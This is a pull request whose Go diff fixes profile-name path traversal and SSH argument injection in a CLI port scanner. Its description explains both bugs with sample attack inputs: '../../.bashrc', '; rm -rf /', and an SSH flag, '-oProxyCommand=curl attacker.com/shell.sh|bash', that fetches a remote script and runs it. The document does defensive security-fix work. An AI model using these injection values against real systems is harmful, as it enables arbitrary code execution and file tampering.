### PR TITLE
fix: prevent path traversal in profiles and SSH argument injection

### DIFF
--- a/internal/ports/remote.go
+++ b/internal/ports/remote.go
@@ -9,7 +9,8 @@ import (
 // ScanRemote discovers all TCP ports in LISTEN state on a remote host via SSH.
 // It tries ss first, then falls back to lsof.
 func ScanRemote(host string) ([]ListeningPort, error) {
-	cmd := exec.Command("ssh", host, "ss -tlnp 2>/dev/null || lsof -iTCP -sTCP:LISTEN -n -P 2>/dev/null")
+	// "--" prevents host from being interpreted as an SSH flag (e.g. -oProxyCommand=...)
+	cmd := exec.Command("ssh", "--", host, "ss -tlnp 2>/dev/null || lsof -iTCP -sTCP:LISTEN -n -P 2>/dev/null")
 	out, err := cmd.CombinedOutput()
 	if err != nil {
 		if len(out) == 0 {

--- a/internal/profile/profile.go
+++ b/internal/profile/profile.go
@@ -9,6 +9,17 @@ import (
 	"gopkg.in/yaml.v3"
 )
 
+// validateName rejects profile names that contain path separators or traversal components.
+func validateName(name string) error {
+	if name == "" {
+		return fmt.Errorf("profile name must not be empty")
+	}
+	if filepath.Base(name) != name || strings.ContainsAny(name, `/\`) || name == ".." || name == "." {
+		return fmt.Errorf("invalid profile name %q: must not contain path separators or traversal", name)
+	}
+	return nil
+}
+
 // PortEntry describes a single port within a profile.
 type PortEntry struct {
 	Port       int    `yaml:"port"`
@@ -35,6 +46,9 @@ func ProfileDir() string {
 
 // Load reads a profile by name from the profiles directory.
 func Load(name string) (*Profile, error) {
+	if err := validateName(name); err != nil {
+		return nil, err
+	}
 	path := filepath.Join(ProfileDir(), name+".yaml")
 	data, err := os.ReadFile(path)
 	if err != nil {
@@ -75,6 +89,9 @@ func List() ([]string, error) {
 
 // Save writes a profile to the profiles directory.
 func Save(p *Profile) error {
+	if err := validateName(p.Name); err != nil {
+		return err
+	}
 	dir := ProfileDir()
 	if err := os.MkdirAll(dir, 0o755); err != nil {
 		return fmt.Errorf("could not create profiles directory: %w", err)
@@ -94,6 +111,9 @@ func Save(p *Profile) error {
 
 // Delete removes a profile by name.
 func Delete(name string) error {
+	if err := validateName(name); err != nil {
+		return err
+	}
 	path := filepath.Join(ProfileDir(), name+".yaml")
 	if err := os.Remove(path); err != nil {
 		return fmt.Errorf("could not delete profile %q: %w", name, err)


### PR DESCRIPTION
### Profile path traversal (CWE-22)

Profile names are passed directly to `filepath.Join` in `Load`, `Save`, and `Delete`. Since `filepath.Join` normalizes `..` components but doesn't restrict them, a name like `../../.bashrc` resolves outside the intended `~/.config/sonar/profiles/` directory. This allows reading, writing, or deleting arbitrary `.yaml` files anywhere the user has permissions.

In practice this is low risk since it requires the user themselves to pass a malicious name via the CLI, but it's a textbook traversal bug and trivial to guard against. Added a `validateName` check that rejects anything where `filepath.Base(name) != name`.

### SSH argument injection in `ScanRemote`

The host argument in `ScanRemote` is passed as the first positional arg to `ssh` via `exec.Command`. While `exec.Command` bypasses shell interpretation (so classic `; rm -rf /` injection doesn't work), SSH still interprets values starting with `-` as flags. A host value like `-oProxyCommand=curl attacker.com/shell.sh|bash` gets interpreted as an SSH option and executes the ProxyCommand before any connection attempt, that's arbitrary code execution. Same class of bug as CVE-2017-1000117.

This would require a user to run `sonar` with a crafted hostname, so exploitation is unlikely in normal usage. Still worth closing since the fix is just adding `--` before the host arg to terminate SSH option parsing.